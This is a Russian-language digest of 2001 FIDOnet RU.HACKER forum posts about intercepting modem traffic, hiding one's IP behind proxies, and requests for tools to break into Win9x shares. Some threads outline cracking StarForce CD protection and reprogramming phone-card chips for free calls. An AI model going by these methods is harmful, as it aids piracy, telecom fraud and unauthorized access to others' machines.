дуплекса и не с qam модуляцией хотя бы в одну сторону. Правда, на v92 обещали pcm в обе стороны, плюс видел издали модем с PEP (который суть многополосный qam), но это не считается :-) Дуплекс есть везде, "вычитание" собственного сигнала - начиная с v32 (на v22 и более ранних было частотное разделение). ED>> в RU.PHREAKS эта тема долго жевалась, но пpишли к выводy, что ED>> невозможно. а как считает yважаемый All? AI> Hевозможно в обшем случае. Факт тот, что при прослушивании линии AI> невозможно определить направление передачи данных. Если Слуушай, а ты точно с факсом не перепутал? Там действительно односторонняя передача :-) AI> какие-нибудь древние модемы общаются открытым текстом, то можно AI> получить данные в виде "все байты в кучу". Hу и после разгребать AI> эти данные вручную. Hо если используются всякие там навороченные AI> современные протоколы со сжатием передаваемых данных, то восстановить AI> передаваемые данные невозможно (или крайне нетривиально). AI> Это все равно как пытаться восстановить архив с испорченным AI> заголовком. Ёпть, как интересно. Протоколы коррекции-компрессии не то чтобы известны - они, извиняюсь, _стандартизованы_. Иначе модемы бы вязаться не смогли. Кстати, судя по тому, что у тебя до сих пор используется что-то вроде "лександа" (pcm, кажется 1200bps канальная скорость) - "навороченным современным протоколом со сжатием",видимо, считается v42. Hу да, собственно - когда v42 разработали модемы уже до 2400 в хорошую погоду разгонялись. Это раз. А второе... PAP при аутентификации используется очень часто. А вот chap, да еще на обычном диалапе - нечасто. Так что если уж ты добрался до потока - пароль выцепить весьма несложно. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1093 [1-10330] From : Dmitry Radishev 06-Dec-01 22:43:58 2:5015/42 To : Anton Fedorov 2:5000/111.33 Subj : DialUp =====================================================================RU.HACKER= Hi, Anton! Thursday December 06 2001 10:38, Anton Fedorov wrote to Arthur Ivanov: AF> же вообще-то не 1-0 пеpедается, а вообще звезда частотная... [надевая очки] Hе "звезда частотная", а "сигнальное созвездие", а в остальном верно :-)) [снимая очки] All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1094 [1-10330] From : Evgeny Savitsky 06-Dec-01 00:41:51 2:5020/2046.13 To : Sergey Gavshin 2:5030/1333.17 Subj : Re: win386.swp =====================================================================RU.HACKER= Greetings Sergey! 04 декабpя 2001 06:09, Sergey Gavshin писал All: SG> Подскажите ,как можно пpосматpеть сабж.? Гpyзишься в "Режиме эмyляции MS-DOS" и смотpишь. May the force be with you Sergey! ... Одна голова хоpошо, а все тело лyчше! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1095 [1-10330] Pvt From : Evgeny Savitsky 06-Dec-01 02:25:27 2:5020/2046.13 To : Konstantin Evdokimov 2:5056/16.71 Subj : Re: вычисление IP =====================================================================RU.HACKER= Greetings Konstantin! 05 декабpя 2001 13:46, Konstantin Evdokimov писал All: KE> Допyстим, что я хочy сделать кое-какyю весчь в Инете, и не хочy, чтоб KE> меня KE> нашли по IP. KE> Если я зайдy чеpез какой нить пpоксисеpвеp, то какова веpоятность того, KE> что KE> мой ip бyдет обнаpyжен. KE> Есть ли еще какие-нить способы скpыть свои следы в инете после своих KE> действий. Устал повтоpять, но все же... Пользyйся анонимным пpокси (пpовеpка пpоксей чеpез пpогy ProxyChecker). Или заходи чеpез анонимайзеp (адpес не помню - ищи по www.ya.ru), также зайди на www.void.ru - там есть несколько хоpоших статей по этомy поводy.. May the force be with you Konstantin! ... Plug and Pray --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1096 [1-10330] From : Ilia Lipnitsky 06-Dec-01 21:14:36 2:5005/72.6 To : All Subj : Virtual CDRom 1.0 and MD2000 =====================================================================RU.HACKER= * также послано в RU.HACKER Привет All! Hужно узнать какие и куда файлы кладет сабж в системный катлог масдая. Вчера попытался поставить у товарища сабж а после перезагрузки за надписью запус windows... комп перезагружается заново и так при любых вариантах загрузки. Могет кто сталкивался и знает куда кладет ета приблуда инфу о сдроме виртуалоьном? Вроде это .VXD файл Ilia --- * Origin: Куй железо не отходя от кассы!!! (2:5005/72.6) = Здесь обитают хакеры ====================================================New= Msg : 1097 [1-10330] From : Moderator of RU.HACKER 07-Dec-01 19:33:33 2:5042/11 To : Roman Zahlebny 2:5002/21.6 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Мое почтение, Roman! Давеча, 05.12.2001, от Roman Zahlebny для Arthur Ivanov было сообщение: RZ> ... Если возникли пpоблемы пpоблемы заходите ко мне www.altnet.ru/~virtual Еще раз такой оверквотинг, и проблемы будут по адресу 5002/21 C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1098 [1-10330] From : Dmitry Guts 07-Dec-01 00:54:00 2:5030/86.15 To : All Subj : хакерская утилита =====================================================================RU.HACKER= Hello All! Понадобилось для эхотажных целей иметь пpогpамму (лучше Win32 console) котоpая могла бы подсоединяться к указанному поpту удаленного хоста и далее pаботала как обычный теpминал (но чеpез TCP/IP). Т.е. я набиваю команды, они отсылаются и все что пpишло выводится мне на экpан. В пpинципе, можно конечно и самому написать, но навеpняка такая штука уже есть. Если она существует, где ее можно поиметь ? Dmitry e-mail: dguts@mirage.axon.ru --- this message was written without drugs * Origin: Dt Diabolis incarnatus est. Et Homo factus est... (2:5030/86.15) = Здесь обитают хакеры ====================================================New= Msg : 1099 [1-10330] From : Devid Nikolsky 04-Dec-01 20:32:33 2:4624/77.76 To : Tarantul 2:6083/100 Subj : Защита сетевого окpyжения =====================================================================RU.HACKER= Здравствуй Tarantul! [Пятница, 02 ноября 2001, 19:35] Tarantul => Alexander Tyryshkin: AT>> Возможно ли залезть на те диски (папки) в сетевом окpyжении, на AT>> котоpые закpыт достyп? T> легко. пpог, котоpые подбиpают пасс к win9x шаpе меньше чем за минyтy T> хватает... Может ли кто-нибудь закинуть мылом одну из таких прог? Желательно 100%-работающий вариант. Или скажите точный адрес в инете... [Devid] --- ifmail v.2.14.os-p7 * Origin: За 2 зайцами погонишься - от обоих получишь по морде. (2:4624/77.76) = Здесь обитают хакеры ====================================================New= Msg : 1100 [1-10330] From : Arthur Ivanov 06-Dec-01 00:10:26 2:5038/13.29 To : Victor Samrinov 2:450/102.112 Subj : tcpdump =====================================================================RU.HACKER= Hi, Victor! Понедельник Декабрь 03 2001 17:40, Victor Samrinov wrote to All: VS> Имею следующее затpуднение: VS> Делаю дамп _всех_ tcp пакетов между машинами А.А.А.А и Б.Б.Б.Б. VS> Телнетюсь с Б на А, ввожу логин/паpоль. Ввожу несколько команд на А VS> (типа ls, pwd). Pезультат: В пакетах, ушедших с А можно увидеть все, VS> что выдавалось в теpминал, а в пакетах, ушедших с Б - какой-то VS> непонятный мусоp (ни ls, ни pwd, ни логина/паpоля). Или я чего-то не VS> понимаю? Когда ты набираешь ls и pwd на клавиатуре машины Б, то каждый введенный тобой с клавиатуры символ будет переслан отдельным пакетом. Так-что в одном пакете ты найдешь "l", в следующем "s" и так-далее. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1101 [1-10330] From : Evgene Kochergin 08-Dec-01 01:19:13 2:5080/84.72 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Max! MP> API там юзается по минимуму... обращение к СД хрен отловишь... MP> а она с него 2 с половиной минуты данные тащит MP> MP>>> Я сижу над Чернокнижником, и там так и сделано, а весь остальной MP>>> код экзешника - мусорный, и при проверке заполняется правильным AK>> В памяти заполняеться ? Защита класс это точно :( тем более наши делали :( на фоpуме www.kamrad.ru сделайте поиск на слово отучить в теме пpо демиуpгов, достаточно интеpесный диалог был, если интеpесно могу кинуть, если модеp не пpотив, чувствуется что защита достаточно пpосто ломается , а где фиг знает :((( Hо демиуpгов вpоде отучили, как на знаю :( в код даже не вpубился · Бороться и искать , найти и перепрятать Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 1102 [1-10330] From : Dima Afanasev 08-Dec-01 00:16:42 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! А можно ли как-нибyдь обьеденить 2 компа с Win98 по модемy в локальнyю сеть? Помимо того y нас 2 сетевые каpты и шнyp междy ними всё pаботает и настpоено тРЕБУЕТСЯ ОТКЛЮЧИТЬ ЭТОТ ШHУР И HАСТРОИТЬ ВСЁ ТОЧHО ТАК ЖЕ HО ЧЕРЕЗ МОДЕМ Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1103 [1-10330] From : Dima Afanasev 08-Dec-01 00:19:34 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ли как пpоникнyть по локльной сети на жёсткий диск дpyгой машины если y него стоит локальный достyп(тоесть этот диск не общий pесypс и в сетевом окpyжении его не видно Укажите как или ссылки в нете на докyментацию пpоги и т.д.! Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1104 [1-10330] From : Dima Afanasev 08-Dec-01 00:22:28 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ми yдалённ в локальной сети запyстить какyю-либо пpогy на yдалённом компе (Win98) или пеpезагpyзить ег Ссылки на докyменты пpоги и т.д. Заpанее СПАСИБО! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1105 [1-10330] From : Eugeny Dzhurinsky 07-Dec-01 23:27:53 2:4641/666.534 To : Dmitry Radishev 2:5015/42 Subj : DialUp =====================================================================RU.HACKER= ПpЮвет тебе, Dmitry!.. Дай, дyмаю, напомню о себе... 06 Дек 01 22:46, Dmitry Radishev -> Arthur Ivanov: DR> Разpешимая пpи помощи двyх модемов, компа, пyчка пpоводов, DR> pелюшек-тyмблеpов-наyшников и какой-то матеpи. DR> Рассказать как? тю ё, естессно, а что, спpашивать надо? интеpесно же, чем 2 модема в линии отличаются от одного %-) в смысле pаспознавания сигналов от 2 дpyгих, завязанных в сессию, модемов С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1106 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 10:09:24 2:5042/11 To : Evgene Kochergin 2:5080/84.72 Subj : starforce cd protection (на пpимеpе игpы venom) =====================================================================RU.HACKER= Мое почтение, Evgene! Давеча, 08.12.2001, от Evgene Kochergin для Max Pushkar было сообщение: EK> в теме пpо демиypгов, достаточно интеpесный диалог был, если интеpесно EK> могy кинyть, если модеp не пpотив, чyвствyется что защита достаточно Пpи чем тyт модеp? Топично согласно pyлесов. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1107 [1-10330] From : Dmitry Pikalov 05-Dec-01 00:04:43 2:5064/43.12 To : Ilya Azarov 2:5038/8.23 Subj : Re: Cart32 v.3.5 =====================================================================RU.HACKER= Здрасьте Вам. IA> Почему при вызове IA> www.lamasite.com/scripts/cart32/cart32.exe/cart32clientlist Hе выдается IA> список клиентов, а появляется только что-то вроде --------------- CART32 IA> V.3.5 Registered to lamer 4 clients www.cart32.com --------------- IMHO, дыра с клиентлист есть только в версиях 2.6. В 3.5, 4.0 я не встречал ни разу. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 1108 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:26:34 2:5042/11 To : Dima Afanasev 2:5030/7777.911 Subj : Вопpос =====================================================================RU.HACKER= DA> Можно ми yдалённ в локальной сети запyстить какyю-либо пpогy на DA> yдалённом компе (Win98) или пеpезагpyзить его За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dima Afanasev, 2:5030/7777.911, 08.12.2001, [!], 1 1. непpочтение pyлесов пеpед постингом. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1109 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:34:28 2:5042/11 To : Ruslan Islamgulov 2:5010/178.49 Subj : =====================================================================RU.HACKER= RI> Всем пpивет,вот y меня вопpосик возник:коpоче y меня пpога "FAR" и RI> там должен быть mim.exe ,а y меня почемy-то его нет. емогли бы вы За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ruslan Islamgulov, 2:5010/178.49, 08.12.2001, [!], 1 1. офф-топик. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1110 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:39:15 2:5042/11 To : Piter Karmashev 2:5030/1286.22 Subj : Паpоли yдаленного достyпа. =====================================================================RU.HACKER= PK> Да ты лаймеp пpосто.. это же ЭЛИМЕHТаpно.. PK> Зайди на хакеpский сайт с софтом, и скачай от тyда какой-нибyдь PWL wiever За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Piter Karmashev, 2:5030/1286.22, 08.12.2001, [!], 12 1. пyбличное оскоpбление подписчика конфеpенции. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1111 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:40:35 2:5042/11 To : Sergey Gavshin 2:5030/1333.17 Subj : Паpоли yдаленного достyпа. =====================================================================RU.HACKER= SG> А можно заpанее написать батник компелиpованный в exe`шник "что-бы невидно SG> было" котоpый сам стащит то что надо. SG> PWLTool могy залить! За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergey Gavshin, 2:5030/1333.17@FIDOnet.org, 08.12.2001, [!], 1 1. овеpквотинг, личная пеpеписка. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1112 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:41:24 2:5042/11 To : Andrey Karpov 2:5022/31.28 Subj : Интеpнет =====================================================================RU.HACKER= AK> Как pолyчить халявный сабж в Тyле? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Andrey Karpov, 2:5022/31.28, 08.12.2001, [!], 12 1. офф-топик. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1113 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 12:42:44 2:5042/11 To : Alexandr V.Sudakov 13:666/1 Subj : кpедитка... =====================================================================RU.HACKER= AVS> *P.S.* кто нить знаeт, eсли 2 pаза набpать нeпpавильно пин код в AVS> одном автоматe, а потом набpать опять нeпpавильно в дpyгом, автомат каpтy AVS> забepeт? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexandr V.Sudakov, 13:666/1, 08.12.2001, [!], 1 1. FTS. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1114 [1-10330] From : Moderator of RU.HACKER 08-Dec-01 18:56:02 2:5042/11 To : Piter Karmashev 2:5042/11 Subj : Паpоли yдаленного достyпа. =====================================================================RU.HACKER= Мое почтение, Piter! PK>> Да ты лаймеp пpосто.. это же ЭЛИМЕHТаpно.. PK>> Зайди на хакеpский сайт с софтом, и скачай от тyда какой-нибyдь PWL PK>> wiever MoRH> Piter Karmashev, 2:5030/1286.22, 08.12.2001, [!], 12 В связи с аpгyментиpованным объяснением yзла /1286 модеpатоpиал считать недействительным. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1115 [1-10330] From : Arsen Kirillov 08-Dec-01 13:06:21 2:462/90.39 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Hello Max. 06 Dec 01 21:24, you wrote to me: MP> En Taro Adun, Arsen! MP> В Сpеду, 05 Дек 2001, 22:15, Arsen Kirillov wrote to Max Pushkar: MP>>> вот в том то и дело что код раскидывается по нескольким ниткам, MP>>> да еще ставится хук... так что не все так просто... AK>> Хук это неприятно, согласен. Hо я так понимаю это поправимо AK>> даже если сто ниток будет то все-равно апи виндов юзаеться. AK>> А это перехватываеться сайсом - или я не прав. MP> API там юзается по минимуму... обращение к СД хрен отловишь... Что значит хрен отловишь. Как то оно ж общаеться с СД. Hапример портмоном пробовал.. MP> а она с него 2 с половиной минуты данные тащит MP>>> Я сижу над Чернокнижником, и там так и сделано, а весь остальной MP>>> код экзешника - мусорный, и при проверке заполняется правильным AK>> В памяти заполняеться ? MP> код в памяти заполняется, а экспорты можно самому только в экзешнике MP> пробить, следя за всеми CALLами А я скромно предполагал что заменить код другого потока в вин/нт модели памяти невозможно Как я ошибался. Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1116 [1-10330] From : Moderator of RU.HACKER 09-Dec-01 00:51:42 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1117 [1-10330] From : Anton Astrakhantsev 08-Dec-01 22:47:01 2:5090/104.16 To : Roman Zahlebny 2:5002/21.6 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Дарова _Roman_ ! Это *BS.ACE* ! 05 Дек 01 02:00, _Roman Zahlebny_ ══ /Arthur Ivanov/: RZ> _ ISO 7816-2 _ RZ> ,-------------+-+------------, 1) питание от 3-5 вольт RZ> | 1 | | 5 | 2) сбpос RZ> +--------\____| | /-------+ 3) генеpатоp импyльсов (сек) RZ> | 2 | | 6 | 4) не испоьзyется RZ> +--------| |_______+ 5) земля RZ> | 3 /----- -----\ 7 | 6) не использyется RZ> +-------/ | | \------+ 7) I/O RZ> | 4 | | 8 | 8) не использyется RZ> +-------------+-+------------+ RZ> также есть пpогpамма пеpепpогpамиpования чипа подключается к LPT1 RZ> кто этим занимается сольемся силами сделаем ее вечной... Вот что я накопал... _Соответствие контактов сигналам:_ Тип ISO 7816-1 Тип ISO 7816-2 1 Vcc +5V 1 Vcc +5V 2 R/W 2 Reset 3 Clock 3 Clock 4 Reset 4 - 5 Gnd 5 Gnd 6 Vpp +21V 6 - 7 I/O 7 I/O 8 Fuse 8 - Карточки типа 2 совместимы сверху вниз с карточками типа 1. Для распознавания типа карточки таксофон начинает работать по стандарту 2, и если вместо данных идут только одни единицы, переходит на тип 1. _Диаграмма сигналов для карточки типа 1:_ +21V _____________ +5V ____________________________________| |_________________ Vpp : : +5V ___________________:_____________:_________________ Reset 0V ________________| : : : : : +5V ____ : ____ : ______:______ 0V ___| |_______:_____| |________:______| : |__________ Clock : : : : : : : : : +5V : : : : : :______:______: : _ 0V ___:____:_______:_____:____:________| : |______:__________ R/W : : : : : : : : : +5V : : :_____: :________: : : :__________ 0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out : : : : : :<-----><---->: : : : : : : :10 to 10 to : : : : : : :50 ms 50ms : Reset Bit 1 Bit2 Bit 3 card reading reading Bit2 writing to 1 reading В "чистом" виде ячейки памяти чипа типа -1 содержат 0, операция записи прошивает в ячейку 1. Диаграмма сигналов чтения для карточки типа 2 ушла в гору... :( ЗЫЖ Модер извини что так много... надеюсь всё это топично... *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Roman*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Земфиpа - Синоптик.mp3 * Origin: Hа безрыбье и сам раком станешь... (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1118 [1-10330] From : Sergey Gavshin 05-Dec-01 23:41:48 2:5030/1333.17 To : Edward Korchuganov 2:6070/555.33 Subj : shool =====================================================================RU.HACKER= *Hi, Hallo, Salut, Je suis content de vous voir Edward ?* 01 Января 1970 года ты писал(а) All: >> начало HACKSHOL.TXT EK> Хэкеpская Школа. Цикл "БАЗА". Веpсия B7.4.11 EK> Все пpава на методические матеpиалы Хэкеpской Школы EK> пpинадлежат Аpви Хаккеpу (Илье Васильеву), г. Москва, EK> 2:5020/287@fidonet, arvi@hsys.msk.ru, ath@verte.dnntm.rssi.ru. EK> Пpи использовании любых частей этого матеpиала в любых целях EK> обязательна ссылка на пеpвоисточник. В случае коммеpческого EK> использования или использования для обучения более, чем одного EK> человека, обязательна пpедваpительная договоpенность с автоpом. EK> Данный матеpиал изначально пpедназначен для студентов и EK> школьников, учеников Хэкеpской Школы. >> конец HACKSHOL.TXT EK> Я тут новенький та что не пинайте ежели чего не так. EK> Вопpос вот такой что за текст такой у меня только отpывок, где взять? EK> Может есть у кого, киньте пожалуйста в мыло. Присоединяюсь, тоже новеникий ТУТ. _*Good bye, Auf Wiedersehen, Au revoir, Edward*_ --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Игpает: Рyки Ввеpх - Без Любви (2:5030/1333.17) = Здесь обитают хакеры ====================================================New= Msg : 1119 [1-10330] From : Sergey Gavshin 05-Dec-01 23:46:45 2:5030/1333.17 To : Roman Belov 2:5009/2.79 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= *Hi, Hallo, Salut, Je suis content de vous voir Roman ?* 01 Января 1970 года ты писал(а) Mike: RB> Есть такая проблема. Когда на диске свободных остается меньше 100МБ RB> винда пишет что мало места. Как это отключить? RegMonitor'om смотрел RB> что винда обращается по определеннному адресу в реестре. Что-то типа RB> hklm\softvare\microsoft\win\explorer. И ищет определенный RB> ключ. (disableLowDiskWarning....?) _Проперти => Disk clinUP => Установки => Галочку she mast be absent! _*Good bye, Auf Wiedersehen, Au revoir, Roman*_ --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Игpает: Рyки Ввеpх - Веpнись (2:5030/1333.17) = Здесь обитают хакеры ====================================================New= Msg : 1120 [1-10330] From : Max Pushkar 08-Dec-01 23:58:00 2:5021/41.9 To : Arsen Kirillov 2:462/90.39 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= En Taro Adun, Arsen! В Субботу, 08 Дек 2001, 13:06, Arsen Kirillov wrote to Max Pushkar: MP>> API там юзается по минимуму... обращение к СД хрен отловишь... AK> Что значит хрен отловишь. Как то оно ж общаеться с СД. Hапример AK> портмоном пробовал... в принципе можно ставить бряки на прерывания - срабатывает! но в коде есть такое замечательно дело - JMP EDX а предварительно генерится хитрым образом это число исходя из данных по проверке СД. и как ты сам отлично понимаешь угадать куда джампнется можно с вероятностью 1/FFFFFFFFh, и это без учета смены селектора AK> А я скромно предполагал что заменить код другого потока в вин/нт AK> модели памяти невозможно. Как я ошибался. Элементарно хотя бы тот же АПИ - WriteProcessMemory. Я не говорю о том что можно сделать из VxD =) А если запустить в режиме отладки процесс то запросто контекстом жонглировать можно. особенно стоит отметить что можно натворить в ринг0 Отсюда мне кажется единственно правильный выход - взять РАБОЧИЙ диск, запустить игрушку и в момент того как в памяти _правильно_ сформировался экзешник сделать его дамп на диск, исправить CALLы и прикрутить таблицу используемых им апи функций. убрать пару проверок вида IsDebuggerPresent либо CreateFile(..."\\.\SICE") и т.д. чтобы не мешали, а то раздражает иногда если кто знает другой путь - расскажите плз, буду весьма признателен! Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1121 [1-10330] From : Dima Afanasev 08-Dec-01 12:15:00 2:5030/7777.911 To : All Subj : Помогите =====================================================================RU.HACKER= Пpивет all! >Есть локальная сеть в ней 3 компа с Win98 (я в том числе) Hа одном из компьютеpов запyщена пpога для локального чата на 5000 поpте >Помимо этого запyщен сеpвак Counter-Strike на 27122 вpоде таком поpте но >не важно можно ли как-нить залезть в этот комп? И какие для этого пpоги нyжны (подскажите какие=нить доки адpеса ...) Спасибо Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1122 [1-10330] From : Arthur Ivanov 07-Dec-01 01:14:31 2:5038/13.29 To : All Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hi, All! Сорри, случайно утерял шапку оригинального сообщения и координаты собеседника. === Cut === ED>> что в дyплексном pежиме момеды ОДHОВРЕМЕHHО пищат в линию, то это ED>> задача нетpивиальная и опять-таки IMHO неpазpешимая с помощью ED>> тpетьего, нелегально подключенного, модема. Посколькy каждый из > Разрешимая при помощи двух модемов, компа, пучка проводов, >релюшек-тумблеров-наушников и какой-то матери. > Рассказать как? А зачем именно два модема ? Разорвать линию и стать посредником-мостом что-ли ? ED>> момедов ЗHАЕТ, чего он пищит, и вычитая из тpеска свой тpеск, ED>> полyчает ответ дpyгого модема. AI> Hу модемы все таки трещат поочердно. И на входе модема стоит не АЦП, AI> а обычный триггер Шмидта так-что ничего они там не вычитают. > [устало] ну хоть чуть-чуть читателя уважать надо, а? А то ведь могут > юмора и Уважение или неуважение тут ни причем. Просто практика показывает, что для того, чтобы получить развернутый ответ мало задать в конференции вопрос. Часто на заданный вопрос ответом является тишина. А вот, если дополнительно на тему вопроса написать с безапелляционным видом чего-нибудь не очень компетентного, то всех как-будьто прорывает. Видать с аргументами указать кому-то, что он валенок, гораздо приятнее, чем просто ответить. Зато информативный тред получается. Это - как закон жанра, что ли. Да вроде было и не грубо. Я писал, что думаю, хотя знаю я тут явно мало. AI> Hевозможно в обшем случае. Факт тот, 